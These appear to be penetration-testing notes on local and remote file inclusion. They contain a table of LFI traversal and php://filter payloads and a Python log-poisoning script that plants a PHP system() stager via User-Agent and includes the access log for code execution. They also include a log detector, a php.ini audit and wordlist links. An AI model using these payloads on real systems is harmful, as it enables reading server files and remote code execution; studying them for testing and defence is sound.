File Inclusion

Notes on basic file inclusion attacks (LFI and RFI).

Playground

Dangerous Functions

Which functions merely read a file, which ones execute it as code, and which ones will fetch a remote URL (the precondition for RFI):

| Language | Function | Read Content | Execute | Remote URL |
|---|---|---|---|---|
| PHP | include()/include_once() | ✅ | ✅ | ✅ |
| PHP | require()/require_once() | ✅ | ✅ | ❌ |
| PHP | file_get_contents() | ✅ | ❌ | ✅ |
| PHP | fopen()/file() | ✅ | ❌ | ❌ |
| NodeJS | fs.readFile() | ✅ | ❌ | ❌ |
| NodeJS | res.sendFile() | ✅ | ❌ | ❌ |
| NodeJS | res.render() | ✅ | ✅ | ❌ |
| Java | include | ✅ | ❌ | ❌ |
| Java | import | ✅ | ✅ | ✅ |
| .NET | @Html.Partial() | ✅ | ❌ | ❌ |
| .NET | @Html.RemotePartial() | ✅ | ❌ | ✅ |
| .NET | Response.WriteFile() | ✅ | ❌ | ❌ |
| .NET | include | ✅ | ✅ | ✅ |

Local File Inclusion (LFI)

Local File Inclusion (LFI) is a type of vulnerability where an attacker can exploit a web application to include files that are already present on the server. By manipulating input parameters, such as URLs or form fields, the attacker can trick the application into loading files from the local file system, potentially accessing sensitive information or executing malicious code.

Basic LFI Payloads

| Command | Description |
|---|---|
| /etc/passwd | Basic LFI: the parameter is passed straight to the include, so an absolute path works |
| ../../../../etc/passwd | LFI with path traversal from the directory the include resolves against |
| /../../../etc/passwd | LFI with name prefix: when the application prepends a string (e.g. lang_) to the input, the leading / turns that prefix into a directory component that the following ../ climb out of; adjust the depth to the target |
| ./languages/../../../../etc/passwd | LFI with approved path: keeps the prefix a weak "must start with ./languages/" check expects, then traverses out of it |
| php://filter/read=convert.base64-encode/resource=config | LFI with Base64 filter: returns the source of the target (config.php if the application appends .php) Base64-encoded instead of executing it, so credentials in PHP files can be read |
| ../../../../etc/passwd%00 | LFI with null byte: truncates an appended extension such as .php; only works on PHP < 5.3.4 |

Log Poisoning to RCE

Access Log Location

Apache:

Nginx:

  • /var/log/nginx/access.log

LFI to RCE
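The two-step flow (poison the access log through the User-Agent header, then include the log file through the LFI parameter) as an added Python example; this is not code from the original notes or from any of the tools listed below. The target URL, the parameter name language, the FakeServer stand-in and its canned command output are constructed so the block runs offline; in the field the same exploit() is driven with a thin wrapper around requests.get.

```python
"""Log poisoning: plant PHP in a request field the web server logs verbatim
(User-Agent), then include the access log via the LFI so PHP executes the
planted code and reads the command from a second parameter."""
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# Single quotes on purpose: Apache (ap_escape_logitem) and nginx both escape
# double quotes and backslashes when writing the log, which would break the PHP.
STAGER = "<?php system($_GET['cmd']); ?>"


def poison_request(target_url, stager=STAGER):
    """Request that gets the stager written into access.log. Any URL on the
    vhost works, including the vulnerable page itself."""
    return target_url, {"User-Agent": stager}


def trigger_url(base_url, lfi_param, log_path, cmd):
    """Second request: include the log through the LFI; cmd is read by the stager."""
    return base_url + "?" + urlencode({lfi_param: log_path, "cmd": cmd})


def exploit(get, base_url, lfi_param, log_path, cmd):
    """get(url, headers) -> response body. Injected so the same flow runs with
    requests.get in the field and with the in-memory fake below."""
    url, headers = poison_request(base_url)
    get(url, headers)                                                   # step 1: poison
    return get(trigger_url(base_url, lfi_param, log_path, cmd), {})    # step 2: include


# Blue-team side: the poisoning is visible in the log itself.
PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)


def find_poisoned_lines(log_text):
    return [line for line in log_text.splitlines() if PHP_TAG.search(line)]


class FakeServer:
    """Constructed stand-in for a vulnerable host (not a real server). Every
    request is appended to an in-memory access.log in nginx's combined format;
    including that log 'executes' the stager by substituting canned output."""
    LOG_PATH = "/var/log/nginx/access.log"

    def __init__(self):
        self.log = []

    def get(self, url, headers):
        parts = urlsplit(url)
        request = parts.path + ("?" + parts.query if parts.query else "")
        ua = headers.get("User-Agent", "curl/8.0")
        self.log.append(f'10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET {request} HTTP/1.1" 200 512 "-" "{ua}"')
        q = parse_qs(parts.query)
        if q.get("language", [None])[0] == self.LOG_PATH:
            body = "\n".join(self.log)
            if "cmd" in q:   # canned result standing in for PHP running system()
                body = body.replace(STAGER, f"<output of {q['cmd'][0]}: uid=33(www-data)>")
            return body
        return "<html>index</html>"


if __name__ == "__main__":
    srv = FakeServer()
    print(exploit(srv.get, "http://target/index.php", "language", FakeServer.LOG_PATH, "id"))
    print("poisoned log lines:", find_poisoned_lines("\n".join(srv.log)))
```

Two practical points the fake mirrors: the log must be readable by the web server user for the include to succeed, and once poisoned every include of that log re-executes the stager, so keep the payload to a single small line.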

Remote File Inclusion (RFI)

In most languages, including remote URLs is considered dangerous precisely because it allows this class of vulnerability, so remote inclusion is usually disabled by default. In PHP, for example, include()/require() will only fetch a remote URL when the allow_url_include setting is enabled; it is Off by default and additionally depends on allow_url_fopen being On.
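A small audit of the settings that paragraph refers to, added here as an example (it is not from the original notes): it parses a php.ini and flags allow_url_include=On (the RFI precondition, which also requires allow_url_fopen) as well as a missing open_basedir, which is what confines a local include. Both ini texts are constructed samples.

```python
"""Audit a php.ini for the settings that gate remote and local inclusion.
allow_url_include is Off by default since PHP 5.2 and only has effect when
allow_url_fopen is also On; open_basedir limits which paths PHP may open."""


def parse_php_ini(text):
    """Minimal php.ini reader: ';' starts a comment, [sections] are ignored,
    quotes around values are stripped, the last assignment of a key wins."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        settings[key.strip().lower()] = value.strip().strip('"')
    return settings


def ini_bool(value, default):
    """php.ini truthiness: On/1/True/Yes are true; Off/0/False/No/None/"" are false."""
    if value is None:
        return default
    v = value.lower()
    if v in ("on", "1", "true", "yes"):
        return True
    if v in ("off", "0", "false", "no", "none", ""):
        return False
    return default


def audit(text):
    s = parse_php_ini(text)
    findings = []
    url_fopen = ini_bool(s.get("allow_url_fopen"), True)       # PHP default: On
    url_include = ini_bool(s.get("allow_url_include"), False)  # PHP default: Off
    if url_include and url_fopen:
        findings.append("allow_url_include=On: include()/require() accept http:// and ftp:// URLs (RFI)")
    elif url_include:
        findings.append("allow_url_include=On but allow_url_fopen=Off: remote include is blocked, still set it Off")
    if not s.get("open_basedir"):
        findings.append("open_basedir unset: a local include can reach any file the web server user can read")
    return findings


# Constructed samples, not taken from a real host.
WEAK_INI = """
[PHP]
; permissive configuration seen on lab boxes
allow_url_fopen = On
allow_url_include = On   ; enables RFI
"""

HARDENED_INI = """
[PHP]
allow_url_fopen = On
allow_url_include = Off
open_basedir = "/var/www/html:/tmp"
"""

if __name__ == "__main__":
    for name, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(name, audit(ini) or ["no findings"])
```

On a live host the effective values, including those set per-directory or in .user.ini files, are what matter; `php -i | grep allow_url` or a phpinfo() page shows them rather than the file on disk.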

Automation

Tools

LFImap

WordLists

  • https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Linux

  • https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Windows

  • https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt
